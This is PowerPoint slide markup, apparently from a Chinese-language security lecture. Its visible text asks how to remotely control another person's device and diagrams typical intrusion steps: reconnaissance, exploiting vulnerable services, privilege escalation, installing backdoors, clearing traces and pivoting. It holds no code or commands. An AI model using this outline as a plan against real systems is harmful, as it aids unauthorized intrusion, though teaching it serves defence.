          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE73FD3F-41B2-4521-8F59-61CA26B02F10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4860032" y="2708920"/>
            <a:ext cx="421196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lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何远程控制一台别人的设备？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605885A3-3CB5-481B-95BD-32B804BDA921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4856221" y="4880284"/>
            <a:ext cx="4211960" cy="72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lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>要如何实行？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="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AD081D75-AA35-406E-8D0A-A111AD1D4FA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>典型网络入侵步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E15FE77-AA9D-4333-9D92-4A01C1ED1E74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="138113" y="3846513"/>
            <a:ext cx="685800" cy="12954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目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRP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信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRP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研判</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2E8163-C944-45E1-AB25-5FFB58F3B9D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="976313" y="2246313"/>
            <a:ext cx="685800" cy="12954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判断</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系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3EF08D-E64B-4F02-A599-2A7E996C51A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="3694113"/>
            <a:ext cx="685800" cy="15240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选择</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最简</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方式</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入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{679CE664-7CDD-4FA7-A275-CE911E3496A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1052513" y="4837113"/>
            <a:ext cx="609600" cy="19050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分析</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可能</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有漏</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洞的</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服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21782798-A623-428F-A218-8527C542A44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3262313" y="3694113"/>
            <a:ext cx="685800" cy="15240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获取</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系统</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一定</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权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE2D0C1-A023-43B6-A326-C50229A53E38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4329113" y="3236913"/>
            <a:ext cx="685800" cy="25146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提</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升</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为</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最</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高</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权</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限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32D58BF-B17B-4867-A369-34F276011CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5472113" y="3694113"/>
            <a:ext cx="685800" cy="15240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安装</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多个</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系统</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后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44409BC7-8ED6-486D-8409-7D99000DA396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6538913" y="3694113"/>
            <a:ext cx="685800" cy="15240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清除</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入侵</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脚印</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918B3153-31AF-4E76-A7C7-E399AAFB2CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7605713" y="2322513"/>
            <a:ext cx="1143000" cy="7620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攻击其</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他系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBC3728-3111-4BDD-9118-8F8729075E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7605713" y="4151313"/>
            <a:ext cx="1143000" cy="7620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获取敏</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感信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{443FE26C-3DFB-4A47-B91D-15016F85D559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7605713" y="5903913"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F9B41"/>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作为其</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>他用途</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0CA787-6045-4DD6-B6C8-8DEE1359C72C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2881313" y="4303713"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>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1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="AutoShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BA8082-5D3C-4486-B2A7-61DBCFF0A807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3948113" y="4303713"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>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1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="AutoShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD366CE5-E9BA-460B-94BD-41DC70177F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5014913" y="4303713"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>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1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="AutoShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB69AFFC-438C-422E-94B9-5BF1F5D7B483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6157913" y="4303713"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>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1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="AutoShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A403D86A-B3D0-4DC9-BD3E-2E988552A4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7224713" y="4303713"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>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1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="AutoShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEA822A-9E3B-4FEA-9E70-790C5094B35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="366713" y="2627313"/>
            <a:ext cx="609600" cy="1219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3300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="AutoShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5B0327-C7F9-4143-8078-8A41D212478D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6996113" y="2474913"/>
            <a:ext cx="609600" cy="1219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3300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="AutoShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{866B5573-8FC2-4583-B965-67684961E545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="442913" y="5141913"/>
            <a:ext cx="609600" cy="1219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3300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0540869-FD1A-42E7-AEB0-E4083284BFC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6996113" y="5218113"/>
            <a:ext cx="609600" cy="121920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3300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{124C11C3-2C5F-42D0-AB9F-12DB6A1C350C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1890713" y="2517775"/>
            <a:ext cx="457200" cy="3919538"/>
            <a:chOff x="1296" y="1179"/>
            <a:chExt cx="288" cy="2469"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61464" name="AutoShape 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADD62829-1479-4045-B76D-ACCF365932EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="3169014">
              <a:off x="1021" y="1454"/>
              <a:ext cx="837" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 72656"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF3300"/>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1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61465" name="AutoShape 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B727A355-F6BF-4FAB-AD15-CCA2CEAF6664}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="18430986" flipV="1">
              <a:off x="1021" y="3086"/>
              <a:ext cx="837" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 72656"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="bg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b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB231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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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8" fill="hold" nodeType="click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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
